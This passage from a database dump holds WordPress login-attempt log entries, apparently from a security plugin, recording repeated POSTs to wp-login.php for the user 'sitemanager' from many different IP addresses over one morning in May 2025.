00:00:00'),(94761,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50270\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.132.183\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746066292.1330891;s:12:\"REQUEST_TIME\";i:1746066292;}}','66.29.132.183',0,'2025-05-01 07:54:53','1970-01-01 00:00:00'),(94762,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"10024\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746066616.522913;s:12:\"REQUEST_TIME\";i:1746066616;}}','185.104.44.163',0,'2025-05-01 08:00:18','1970-01-01 00:00:00'),(94763,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50682\";s:11:\"REMOTE_ADDR\";s:14:\"178.22.126.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746066946.008563;s:12:\"REQUEST_TIME\";i:1746066946;}}','178.22.126.103',0,'2025-05-01 08:05:47','1970-01-01 00:00:00'),(94764,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36854\";s:11:\"REMOTE_ADDR\";s:12:\"52.45.232.96\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746067274.9044011;s:12:\"REQUEST_TIME\";i:1746067274;}}','52.45.232.96',0,'2025-05-01 08:11:16','1970-01-01 00:00:00'),(94765,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55034\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.172.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746067603.2583261;s:12:\"REQUEST_TIME\";i:1746067603;}}','103.161.172.148',0,'2025-05-01 08:16:44','1970-01-01 00:00:00'),(94766,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42070\";s:11:\"REMOTE_ADDR\";s:14:\"38.242.195.184\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746067927.7136869;s:12:\"REQUEST_TIME\";i:1746067927;}}','38.242.195.184',0,'2025-05-01 08:22:09','1970-01-01 00:00:00'),(94767,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57492\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746068256.299963;s:12:\"REQUEST_TIME\";i:1746068256;}}','103.191.76.181',0,'2025-05-01 08:27:38','1970-01-01 00:00:00'),(94768,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57244\";s:11:\"REMOTE_ADDR\";s:15:\"103.169.160.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746068588.7898149;s:12:\"REQUEST_TIME\";i:1746068588;}}','103.169.160.163',0,'2025-05-01 08:33:10','1970-01-01 00:00:00'),(94769,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60594\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746068918.5076981;s:12:\"REQUEST_TIME\";i:1746068918;}}','68.65.122.90',0,'2025-05-01 08:38:40','1970-01-01 00:00:00'),(94770,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40323\";s:11:\"REMOTE_ADDR\";s:14:\"173.249.144.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746069250.175554;s:12:\"REQUEST_TIME\";i:1746069250;}}','173.249.144.88',0,'2025-05-01 08:44:11','1970-01-01 00:00:00'),(94771,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54458\";s:11:\"REMOTE_ADDR\";s:14:\"20.198.224.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHO